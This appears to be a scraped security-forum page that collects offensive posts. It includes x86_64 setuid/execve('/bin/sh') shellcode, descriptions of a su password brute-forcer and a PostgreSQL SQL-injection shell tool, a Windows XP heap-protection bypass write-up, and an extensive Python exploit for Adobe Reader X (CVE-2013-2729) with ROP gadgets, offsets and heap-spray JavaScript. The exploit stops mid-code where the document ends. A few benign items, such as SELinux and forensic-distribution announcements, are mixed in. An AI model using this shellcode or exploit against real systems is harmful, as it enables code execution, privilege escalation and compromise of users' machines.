CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # (c) Tim Brown, 2009 # <mailto:timb@nth-dimension.org.uk> # <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> # # setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux .text .globl _start _start: # uid = 0 xor %edi, %edi # set %edi to 0 # setuid mov $0x69, %al # set %al to 69 (setuid) syscall # enter the kernel # *filename = "/bin//sh" xor %ax, %ax # set %ax to 0 push %ax # push %ax on to the stack movq $0x68732f2f6e69622f, %rbx # set %rbx to "hs//nib/" pushq %rbx # push %rbx on to the stack movq %rsp, %rdi # set %rdi to %esp # **argv = [0, *filename] xorq %rcx, %rcx # set %rcx to 0 pushq %rcx # push %rcx on to the stack pushq %rdi # push %rdi on to the stack movq %rsp, %rsi # set %rsi to %rsp # execve mov $0x3b, %al # set %al to 59 (execve) syscall # enter the kernel L-am postat deoarece e explicat. Sursa: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm

Breaking the links: Exploiting the linker Abstract The recent discussion relating to insecure library loading on the Microsoft Windows platform provoked a signicant amount of debate as to whether GNU/Linux and UNIX variants could be vulnerable to similar attacks. Whilst the general consensus of the Slashdot herd appeared to be that this was just another example of Microsoft doing things wrong, I felt this was unfair and responded with a blog post[1] that sought to highlight an example of where POSIX style linkers get things wrong. Based on the feedback I received to that post, I decided to investigate the issue a little further. This paper is an amalgamation of what I learnt. As such it contains my own research, the discoveries of others and POSIX lore. Contents 1 Technical Details 2 1.1 What is the linker? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.1 The link editor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.2 The runtime linker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2 The linker attack surface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.1 The process of linking and executing . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.2 Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.2.3 Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 1.2.4 issetugid() and friends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 1.3 Real world exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 1.3.1 The runtime linker as an interpreter . . . . . . . . . . . . . . . . . . . . . . . 6 1.3.2 The empty library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.3.3 SIGSEGV'ing for 12 years . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 1.3.4 What's in your RPATH? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1.3.5 Debian makes me sad . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 1.3.6 If an environment variables is set but you don't trust it, is it still there? . . . 11 1.3.7 Re ections on Trusting Trust revisited . . . . . . . . . . . . . . . . . . . . . . 12 1.3.8 Mapping NULL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 1.4 Auditing scripts, binaries and source . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.4.1 Scripts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.4.2 Binaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.4.3 Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.5 Further research . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 1.5.1 Other linkers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 2 Changes 14 BTL.pdf (2547 downloads) © Tim Brown License: n/a Paper on exploiting linkers Download BTL.pdf Sursa: Nth Dimension/downloads:: Negatively discriminating against idiots since 1995!

sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. This tool comes in handy as final instance on a system where you have not to many privileges but you are in the wheel group. Many su implementations require a pseudo terminal to be attached in order to take the password from the user. This is why you couldn't just use a simple shell script to do this work. This tool, written in c, is highly efficient and can attempt multiple logins at the same time. Please be advised that using this tool will take a lot of the CPU performance and fill up the logs quite quickly. sucrack is so far known to be running on FreeBSD, NetBSD, Linux Download [TABLE] [TR] [TD]sucrack-1.2.3.tar.gz[/TD] [TD]109 kb[/TD] [TD]README[/TD] [TD]ChangeLog[/TD] [/TR] [TR] [TD]sucrack-1.2.2.tar.gz[/TD] [TD]103 kb[/TD] [TD]README[/TD] [TD][/TD] [/TR] [/TABLE] Installation Default installation ./configure make make install You have two further compiling flags: Usage In order to run sucrack, you need to specify a wordlist: sucrack wordlist.txt Or advise it to read the passwords from stdin. In that case other tools with smart password generation algorithms could be easily used. For instance John The Ripper: john --stdout --incremental | sucrack - You generally will have two options for printing the progress and the statistics (if you have compiled sucrack with the `--enable-statistics' flag). Either by using ansi escapes codes, what makes it look nicer or without. The -a flag indicates, whether ansi escape codes should be used or not. Sursa si mai multe informatii: leidecker.info

A tool for exploiting SQL injections in PostgreSQL databases. Download [TABLE] [TR] [TD]pgshell[/TD] [/TR] [TR] [/TR] [TR] [TD]test-env.sh [/TD] [/TR] [/TABLE] Introduction The pgshell Perl script exploits configuration weaknesses in the PostgreSQL database management system as they were discribed in the corresponding paper (Having Fun With PostgreSQL). It not only allows to gather target system and user information but also privilege escalation, executing of shell commands and uploading of binary files. The general usage of pgshell could be outlined in three steps: gathering information creating the system and the upload framework launching a shell and uploading files The minimal parameters are the target host and a request file. The request file contains the HTTP request to send to the server plus a tag <<INJECTION>> that indicates, where to perform the SQL injection. A simple request file can look like this: GET /index.php?id=1;<<INJECTION>> HTTP/1.0 If not stated otherwise, every execution of pgshell reads from and writes to a session file. This way, informations won't get lost and the process can be resumed at any time. Additional there are certain settings that can be made in order to work properly against the target system. If you wish to launch a shell or to upload files you need to know the path to the libc. Furthermore, for uploading files, pgshell creates a function which uses the libc function open. Two parameters are needed in order to successfully open a file. These values are the OR'ed (O_CREAT | O_APPEND | O_RDWR) and S_IRWXU. Find out, what values those will be on your target system and put everything in an initial session file: =target.libc=/lib/libc.so.6 =target.flag.open=522 =target.flag.mode=448 Sursa si mai multe informatii: leidecker.info

[h=2]This Week In CyanogenMod[/h]July 19th, 2013 • Written by ciwrl Week Ending: July 19, 2013 – Special SELinux Edition “This Week in CyanogenMod” is an ongoing feature that aims to serve as a one-stop shop for weekly updates. Topics discussed are culled from our social media accounts, gerrit, status updates and general thoughts. This week was about all SELinux and adjusting our source to accommodate it. What is SELinux? The project’s official description reads “SELinux is a security enhancement to Linux which allows users and administrators more control over access control.” SELinux is a set of Open sourced and peer reviewed changes to the core Android Software stack to help prevent apps from performing malicious activities. This is done by establishing a set of policies that act as mandatory access controls (MAC). Depending on the policy, it can do things such as prevent apps from running or accessing specific data, to preventing root access altogether. SELinux has wide-scale adoption throughout the linux landscape, with Fedora, Red Hat and others incorporating policies to better the system security. The default policies are usually written per distribution, by their maintainers – we have begun this process for CyanogenMod. We will be working on this policy creation in parallel to Google’s own policies for Android, which we believe will be released with the Android 4.3 source; effectively getting us ahead of the eventual 4.3 source release. As this process is open source, policy creation and suggestions will be handled via our gerrit instance. What it’s not? SELinux is not a backdoor for government agencies to spy on you. It is not PRISM, PROMIS, CARNIVORE, The Great Firewall or any other ominous Big Brother-like initiative. Access Control Modes By default, we will be shipping with SELinux capabilities enabled in the kernel, but in a Permissive mode. What this means is that your phone will behave exactly as it currently does, with no noticeable change to the user. There are 3 modes in total, Enforcing, Permissive and Disabled. While in Enforcing mode, SELinux policies are enforced, preventing whatever causes a violation (ie su). Permissive mode logs policy violations, but does not prevent the activity that caused it. Disabled turns SELinux off. We are using Permissive mode as our default so we can come up with sensible policies. If you submit a log for us to analyze (via JIRA) for SELinux policy improvements, the logged exceptions will be of high value. This will be an ongoing process as we work to incorporate sensible policies for each device repo. As always our source is available on Github and patches will be peer reviewed via gerrit. For those more attuned to personal data security, you are welcome to watch and audit our efforts. For the rest of you, sit back and relax – no need for pitchforks. Sursa: This Week In CyanogenMod | CyanogenMod

Distribution Release: DEFT Linux 8 Stefano Fratepietro has announced the release of DEFT Linux 8, a Lubuntu-based distribution and live DVD featuring a collection of open-source tools for digital forensics and penetration testing: "Dear guys, we did our best to turn the DEFT 8 beta version into stable -- also by listening to your precious suggestions and feedback -- and here we are. You can download the DEFT 8 final stable ISO image (which now includes DART 2). The stable version has been checked against common bugs but we are human and pretty busy with our jobs so if we missed something, just drop a line to bug at deftlinux.net and we'll collect suggestions and bug fixes for the next release. A big thank to the DEFT team and to all the supporters. Stay tuned, because much more is yet to come, such as the release of the DEFT 8 virtual appliance (a pre-configured virtual machine you will be able to launch on your workstation by means of VMware Workstation or VMPlayer or Virtualbox); the DEFT 8 user manual; the updated website." Here is the brief release announcement. Download: deft8.iso (2,764MB, MD5). • 2013-07-20: Distribution Release: DEFT Linux 8 • 2013-07-01: Development Release: DEFT Linux 8 Beta • 2012-10-23: Distribution Release: DEFT Linux 7.2 • 2012-04-02: Distribution Release: DEFT Linux 7.1 • 2012-02-01: Distribution Release: DEFT Linux 7 • 2012-01-14: Development Release: DEFT Linux 7 RC1 Sursa: Distribution Release: DEFT Linux 8 (DistroWatch.com News)

Hacking XPath 2.0 Introducing XPath XPath 1.0 is a well-supported and fairly old query language for selecting nodes in an XML document and returning a computed value from the selected nodes. There are plenty of libraries implementing full or basic support for XPath 1.0 in a huge variety of languages including Java, C/C++, Python, C#, Haskell, JavaScript and Perl. Using XPath 1.0 you can write simplistic queries that filter nodes within a single specified XML document. For example, given the following XML document shown below it would be trivial to check if a user existed and authenticate them based upon a supplied username and password. Download: http://t.co/LUKlB73jhy

SpiderFoot v2.0 Released SpiderFoot is a free, open-source footprinting tool, enabling you to perform various scans against a given domain name in order to obtain information such as sub-domains, e-mail addresses, owned netblocks, web server versions and so on. The main objective of SpiderFoot is to automate the footprinting process to the greatest extent possible, freeing up a penetration tester’s time to focus their efforts on the security testing itself. Main features Fast, Easy to Use Highly Configurable For Windows & Linux Create your own modules in Python New in this release, which is actually a complete re-write of the version from 2005(!): Now runs on Windows as well as Linux, Solaris, *BSD (basically anything with Python should be fine) Scans are even more configurable than before All scan data stored locally in an SQLite database for querying, reporting and analysis Many more scans/tests included (GeoIP, URL linkage, web technology, port scans…) You can now easily extend functionality by writing your own modules in Python Completely new user interface, which is now entirely web-based Configuration state is stored between runs Scanning can be remotely controlled Full Changelog: https://github.com/smicallef/spiderfoot/wiki/Release-Notes More Information: SpiderFoot - The Open Source Footprinting tool Download: http://sourceforge.net/projects/spiderfoot/files/ Sursa: SpiderFoot v2.0 Released | ToolsWatch.org - The Hackers Arsenal Tools | Repository for vFeed and DPE Projects

Android exploitation primers: lifing the veil on mobile offensive security (Vol. I) Table of Contents 1 Overview............................................................................................................ 1 1.1 On the usefulness of information leak vulnerabilities .............................................. 1 2 Technical Details................................................................................................. 2 2.1 Motivation............................................................................................................. 2 2.2 Pre-4.1 information leak exploitation ..................................................................... 3 2.3 Post-4.1 information leak exploitation .................................................................... 7 2.4 Building your ROP chain dynamically.................................................................... 7 2.4.1 Searching for the gadgets ................................................................................. 7 2.4.2 Building the ROP chain ................................................................................... 9 2.4.3 Identifying the Android version and JavaScript engine............................................. 9 2.5 Case study: Leveraging CVE-2010-4577 ................................................................. 11 2.5.1 The bug ...................................................................................................... 11 2.5.2 Exploitation walk-through............................................................................... 14 2.6 Mitigation ........................................................................................................... 17 2.7 Future work ......................................................................................................... 17 3 Closing words................................................................................................... 19 3.1 Lessons learned.................................................................................................... 19 3.2 To mobile device and so?ware vendors ................................................................. 19 3.3 An open le?er for the exploit market..................................................................... 20 References .............................................................................................................. 26 Download: https://subreption.com/site_media/uploads/reports/droidleak_release.pdf

[h=3]Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass[/h]Author: Alexander Anisimov Heap Overflow Let`s take a look at this pretty simple example of a vulnerable function: As we can see here the vulner() function copies data from a string pointed by str to an allocated memory block pointed at by buf, without a bound check. A string larger than 127 bytes passed to it will thereby overwrite the data coincidental to this memory block (Which is, actually, a header of the following memory block). The heap overflow exploitation scenario usually proceeds on like this: If during the buffer overflow the neighboring block exists, and is free, then the Flink and Blink pointers are replaced (Fig. 5). At the precise moment of the removal of this free block from the doubly-linked freelist a write to an arbitrary memory location happens: For example, the Blink pointer could be replaced by the unhandled exception filter address (UEF -- UnhandledExceptionFilter), and Flink, accordingly, by the address of the instruction which will transfer ther execution to the shellcode. [*] More detailed information about the heap overflows is provided in the “Windows Heap Overflows” whitepaper (by David Litchfield, BlackHat 2004). Fig. 1 In Windows XP SP2 the allocation algorithm was changed -- now before the removal of a free block from the freelist, a pointer sanity check is performed with regard to the previous and next block addresses (safe unlinking, fig. 2.): Fig. 2 Then that block gets deleted from the list. The memory header block was changed, besides other things (fig. 7.). A new one-bytelarge 'cookie' field was introduced, which holds a unique precomputed token -- undoubtely designed to ensure header consistency. This value is calculated from the header address and a pseudorandom number generated during the heap creation: The consistency of this token is checked only during the allocation of a free memory block and only after its deletion from the free list. If at least one of these checks fails the heap is considered destroyed and an exception follows. The first weak spot -- the fact that the cookie gets checked at all only during free block allocation and hence there is no checks upon block freeing. However in this situation there is nothing you can do except changing the block size and place it into an arbitrary freelist. And the second weak spot – the manipulation of the lookaside lists doesn`t assume any header sanity checking, there isn`t even a simple cookie check there. Which, theoretically, results in possibility to overwrite up to 1016 bytes in an arbitrary memory location. The exploitation scenario could proceed as follows: if, during the overflow the concidental memory block is free and is residing in the lookaside list, then it becomes possible to replace the Flink pointer with an arbitrary value. Then, if the memory allocation of this block happens, the replaced Flink pointer will be copied into the header of the lookaside list and during the next allocation HeapAlloc() will return this fake pointer. The prerequisite for successful exploitation is existence of a free block in lookaside list which neighbors with the buffer we overflow. This technique was successfully tested by MaxPatrol team in trying to exploit the heap buffer overflow vulnerability in the Microsoft Windows winhlp32.exe application using the advisory published by the xfocus team: http://www.xfocus.net/FLASHSKY/ICOEXP/INDEX.HTML The effect of a successful attack: Arbitrary memory region write access (smaller or equal to 1016 bytes). Arbitrary code execution (appendix A). DEP bypass. (DEP is Data Execution Prevention) (appendix . Full article: http://bit.ly/ZTdhuM Sursa: Positive Research Center: Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass

Adobe Reader X BMP/RLE heap corruptionCVE-2013-2729 / XFABMPExploit.py '''Title: Adobe Reader X BMP/RLE heap corruption Product: Adobe Reader X Version: 10.x Product Homepage: adobe.com Binary affected: AcroForm.api Binary Version: 10.1.4.38 Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841 Configuration Requirements ----------------------------------------- Default configuration. Vulnerability Requirements ----------------------------------------- None. Vulnerability Description ----------------------------------------- Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow. Vulnerability WorkAround (if possible) ----------------------------------------- Delete AcroForm.api ''' from hashlib import md5 import sys, struct ######### Begin of the miniPDF import zlib #For constructing a minimal pdf file ## PDF REference 3rd edition:: 3.2 Objects class PDFObject: def __init__(self): self.n=None self.v=None def __str__(self): raise Exception("Fail") ## PDF REference 3rd edition:: 3.2.1 Booleans Objects class PDFBool(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): if self.s: return "true" return "false" ## PDF REference 3rd edition:: 3.2.2 Numeric Objects class PDFNum(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "%s"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects class PDFString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings class PDFHexString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "<" + "".join(["%02x"%ord© for c in self.s]) + ">" ## A convenient type of literal Strings class PDFOctalString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s="".join(["\\%03o"%ord© for c in s]) def __str__(self): return "(%s)"%self.s ## PDF REference 3rd edition:: 3.2.4 Name Objects class PDFName(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "/%s"%self.s ## PDF REference 3rd edition:: 3.2.5 Array Objects class PDFArray(PDFObject): def __init__(self,s): PDFObject.__init__(self) assert type(s) == type([]) self.s=s def append(self,o): self.s.append(o) return self def __str__(self): return "[%s]"%(" ".join([ o.__str__() for o in self.s])) ## PDF REference 3rd edition:: 3.2.6 Dictionary Objects class PDFDict(PDFObject): def __init__(self, d={}): PDFObject.__init__(self) self.dict = {} for k in d: self.dict[k]=d[k] def __iter__(self): for k in self.dict.keys(): yield k def __iterkeys__(self): for k in self.dict.keys(): yield k def __getitem__(self, key): return self.dict[key] def add(self,name,obj): self.dict[name] = obj def get(self,name): if name in self.dict.keys(): return self.dict[name] else: return None def __str__(self): s="<<" for name in self.dict: s+="%s %s "%(PDFName(name),self.dict[name]) s+=">>" return s ## PDF REference 3rd edition:: 3.2.7 Stream Objects class PDFStream(PDFDict): def __init__(self,d={},stream=""): PDFDict.__init__(self,d) self.stream=stream self.filtered=self.stream self.add('Length', len(stream)) self.filters = [] def appendFilter(self, filter): self.filters.append(filter) self._applyFilters() #yeah every time .. so what! def _applyFilters(self): self.filtered = self.stream for f in self.filters: self.filtered = f.encode(self.filtered) if len(self.filters)>0: self.add('Length', len(self.filtered)) self.add('Filter', PDFArray([f.name for f in self.filters])) #Add Filter parameters ? def __str__(self): self._applyFilters() #yeah every time .. so what! s="" s+=PDFDict.__str__(self) s+="\nstream\n" s+=self.filtered s+="\nendstream" return s ## PDF REference 3rd edition:: 3.2.8 Null Object class PDFNull(PDFObject): def __init__(self): PDFObject.__init__(self) def __str__(self): return "null" ## PDF REference 3rd edition:: 3.2.9 Indirect Objects class UnResolved(PDFObject): def __init__(self,n,v): PDFObject.__init__(self) self.n=n self.v=v def __str__(self): return "UNRESOLVED(%d %d)"%(self.n,self.v) class PDFRef(PDFObject): def __init__(self,obj): PDFObject.__init__(self) self.obj=[obj] def __str__(self): if len(self.obj)==0: return "null" return "%d %d R"%(self.obj[0].n,self.obj[0].v) ## PDF REference 3rd edition:: 3.3 Filters ## Example Filter... class FlateDecode: name = PDFName('FlateDecode') def __init__(self): pass def encode(self,stream): return zlib.compress(stream) def decode(self,stream): return zlib.decompress(stream) ## PDF REference 3rd edition:: 3.4 File Structure ## Simplest file structure... class PDFDoc(): def __init__(self,obfuscate=0): self.objs=[] self.info=None self.root=None def setRoot(self,root): self.root=root def setInfo(self,info): self.info=info def _add(self,obj): if obj.v!=None or obj.n!=None: raise Exception("Already added!!!") obj.v=0 obj.n=1+len(self.objs) self.objs.append(obj) def add(self,obj): if type(obj) != type([]): self._add(obj); else: for o in obj: self._add(o) def _header(self): return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n" def __str__(self): doc1 = self._header() xref = {} for obj in self.objs: xref[obj.n] = len(doc1) doc1+="%d %d obj\n"%(obj.n,obj.v) doc1+=obj.__str__() doc1+="\nendobj\n" posxref=len(doc1) doc1+="xref\n" doc1+="0 %d\n"%(len(self.objs)+1) doc1+="0000000000 65535 f \n" for xr in xref.keys(): doc1+= "%010d %05d n \n"%(xref[xr],0) doc1+="trailer\n" trailer = PDFDict() trailer.add("Size",len(self.objs)+1) if self.root == None: raise Exception("Root not set!") trailer.add("Root",PDFRef(self.root)) if self.info: trailer.add("Info",PDFRef(self.info)) doc1+=trailer.__str__() doc1+="\nstartxref\n%d\n"%posxref doc1+="%%EOF" return doc1 ######### End of miniPDF SLIDESIZE=0x12C def mkBMP(payload, exception=True): bmp = '' #getInfoHeader bfType = 0x4d42 assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp bmp += struct.pack('<H', bfType) bfSize = 0 bfOffBits = 0 bmp += struct.pack('<L', bfSize) bmp += struct.pack('<H', 0) #Reserved1 bmp += struct.pack('<H', 0) #Reserved2 bmp += struct.pack('<L', bfOffBits) biSize = 0x40 assert not biSize in [0x12] bmp += struct.pack('<L', biSize) biHeight = 1 biWidth = SLIDESIZE #size of texture structure LFH enabled biPlanes = 1 biBitCount = 8 biCompression = 1 biSizeImage = 0 biXPelsPerMeter = 0 biYPelsPerMeter = 0 biClrUsed = 2 if biClrUsed >0xff: raise "BUG!!!!" biClrImportant = 0 bmp += struct.pack('<L', biWidth) bmp += struct.pack('<L', biHeight) bmp += struct.pack('<H', biPlanes) bmp += struct.pack('<H', biBitCount) bmp += struct.pack('<L', biCompression) bmp += struct.pack('<L', biSizeImage) bmp += struct.pack('<L', biXPelsPerMeter) bmp += struct.pack('<L', biYPelsPerMeter) bmp += struct.pack('<L', biClrUsed) bmp += struct.pack('<L', biClrImportant) bmp += 'A'*(biSize-0x40) #pad numColors=biClrUsed if biClrUsed == 0 or biBitCount < 8: numColors = 1<<biBitCount; bmp += 'RGBA'*(numColors) #pallete bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff) #while (len(bmp)+10)%0x400 != 0: # bmp += '\x00\x02\x00\x00' assert len(payload) < 0x100 and len(payload) >= 3 bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00' bmp += '\x00'+chr(len(payload))+payload if len(payload)&1 : bmp += 'P' if exception: bmp += '\x00\x02\x00\xff'*10 #getting the pointer outside the texture so it triggers an exception bmp += '\x00'+chr(10)+'X'*10 else: bmp += '\x00\x01' #'\x04X'*(biWidth+2000)+"\x00\x02" return bmp def UEncode(s): r = '' s += '\x00'*(len(s)%2) for i in range(0,len(s),2): r+= '\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0]) return r r = '' for c in s: r+= '%%%02x'%ord© return r def mkXFAPDF(shellcode = '\x90'*0x400+'\xcc'): xdp = ''' <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7"> <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/"> <?formServer defaultPDFRenderFormat acrobat9.1static?> <?formServer allowRenderCaching 0?> <?formServer formModel both?> <subform name="form1" layout="tb" locale="en_US" restoreState="auto"> <pageSet> <pageArea name="Page1" id="Page1"> <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/> <medium stock="default" short="612pt" long="792pt"/> <?templateDesigner expand 1?> </pageArea> <?templateDesigner expand 1?> </pageSet> <variables> <script name="util" contentType="application/x-javascript"> // Convenience functions to pack and unpack litle endian an utf-16 strings function pack(i){ var low = (i & 0xffff); var high = ((i>>16) & 0xffff); return String.fromCharCode(low)+String.fromCharCode(high); } function unpackAt(s, pos){ return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16); } function packs(s){ result = ""; for (i=0;i<s.length;i+=2) result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8)); return result; } function packh(s){ return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16)); } function packhs(s){ result = ""; for (i=0;i<s.length;i+=4) result += packh(s.slice(i,i+4)); return result; } var verbose = 1; function message(x){ if (util.verbose == 1 ) xfa.host.messageBox(x); } //ROP0 //7201E63D XCHG EAX,ESP //7201E63E RETN //ROP1 //7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle] //ROP2 //7238EF5C PUSH EAX //7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress] //7238EF63 TEST EAX,EAX //7238EF65 JNE SHORT 7238EF84 //7238EF84 POP EBP //7238EF85 RETN 4 //ROP3 //72001186 JMP EAX ; kernel32.VirtualProtect //ROP4 //72242491 ADD ESP,70 //72242494 RETN var _offsets = {'Reader": { "10.104": { "acrord32": 0xA4, "rop0": 0x1E63D, "rop1": 0x100A, "rop2": 0x38EF5C, "rop3": 0x1186, "rop4": 0x242491, }, "10.105": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, "10.106": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, }, "Exchange-Pro": { "10.105": { // Added by Eddie Mitchell "acrobat": 0xCD, "rop0": 0x3720D, "rop1": 0x100A, "rop2": 0x3DCC91, "rop3": 0x180F, "rop4": 0x25F2A1, }, }, }; function offset(x){ //app.viewerType will be "Reader" for Reader, //"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro try { return _offsets[app.viewerType][app.viewerVersion][x]; } catch (e) { xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!"); } return 0x41414141; } </script> <script name="spray" contentType="application/x-javascript"> // Global variable for spraying var slide_size=%%SLIDESIZE%%; var size = 200; var chunkx = "%%MINICHUNKX%%"; var x = new Array(size); var y = new Array(size); var z = new Array(size); var pointers = new Array(100); var done = 0; </script> <?templateDesigner expand 1?> </variables> <subform w="576pt" h="756pt"> <!-- This image fiel hold the cashing image --> <field name="ImageCrash"> <ui> <imageEdit/> </ui> <value> <image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image> </value> </field> </subform> <event activity="initialize" name="event__initialize"> <script contentType="application/x-javascript"> // This script runs at the very beginning and // is used to prepare the memory layout util.message("Initialize"); var i; var j; if (spray.done == 0){ //Trigger LFH use var TOKEN = "\u5858\u5858\u5678\u1234"; var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2); for (i=0; i < spray.size; i+=1) spray.x = TOKEN + util.pack(i) + spray.chunkx.substring(0, chunk_len) + util.pack(i) + ""; util.message("Initial spray done!"); for (j=0; j < size; j++) for (i=spray.size-1; i > spray.size/4; i-=10) spray.x=null; spray.done = 1; util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"); } // After this the form layout is rendered and the bug triggered </script> </event> <event activity="docReady" ref="$host" name="event__docReady"> <script contentType="application/x-javascript"> // This script runs once the page is ready util.message("DocReady"); var i; var j; var found = -1; // Index of the overlapped string var acro = 0; // Base of the AcroRd32_dll // Search over all strings for the first one with the broken TOKEN for (i=0; i < spray.size; i+=1) if ((spray.x!=null) && (spray.x[0] != "\u5858")){ found = i; acro = (( util.unpackAt(spray.x, 14) >> 16) - util.offset("acrord32")) << 16; util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) ); break; } // Behaviour is mostly undefined if not found if (found == -1){ util.message("Corrupted String NOT Found!"); event.target.closeDoc(true); } // Corrupted string was found let's generates the new // string for overlapping the struct before freeing it var chunky = ""; for (i=0; i < 7; i+=1) chunky += util.pack(0x41414141); chunky += util.pack(0x10101000); while (chunky.length < spray.slide_size/2) chunky += util.pack(0x58585858); // Free the overlapping string util.message("Feeing corrupted string! Previous string will we used-free ("+(found)+")"); for (j=0; j < 100000; j++) spray.x[found-1]=spray.x[found]=null; // Trigger several allocs that will fall over the structure for (i=0; i < 200; i+=1){ ID = "" + i; spray.y = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ ""; } util.message("Allocated 20 chunks-y\\n"); // Heap spraying make's baby jesus cry! // Construct the 0x1000 small chunk for spraying var obj = 0x10101000; var pointer_slide = ""; pointer_slide += util.pack(acro+util.offset("rop4")); //add esp,70;ret for (i=0; i < 27; i+=1) pointer_slide += util.pack(0x41414141); obj += pointer_slide.length*2; // ROP pointer_slide += util.pack(acro+util.offset("rop0")); //XCHG EAX,ESP;ret pointer_slide += util.pack(acro+util.offset("rop1")); //0x100A jmp getmodule pointer_slide += util.pack(acro+util.offset("rop2")); //@0x04 - getProcAddress pointer_slide += util.pack(obj+0xDC); //@0x08 point to KERNEL32 //@0x10 pointer_slide += util.pack(obj+0xCC); pointer_slide += util.pack(0x43434343); // POPPED TO EBP pointer_slide += util.pack(acro+util.offset("rop3")); // JMP EAX pointer_slide += util.pack(obj); //Points to offset 0 of this //@0x20 pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(0x1000); //SIZE_T dwSize, pointer_slide += util.pack(0x40); // DWORD flNewProtect, //0x30 pointer_slide += util.pack(obj+0x34); //PDWORD lpflOldProtect pointer_slide += util.pack(0x00000000); //DWORD OldProtect pointer_slide += util.packhs("E9B1000000909090"); //0x40 pointer_slide += util.pack(acro); //Used by next stage pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x50 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x60 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x70 pointer_slide += util.pack(acro); pointer_slide += util.pack(0x48484848); pointer_slide += util.pack(0x49494949); pointer_slide += util.pack(0x49494949); //0x80 pointer_slide += 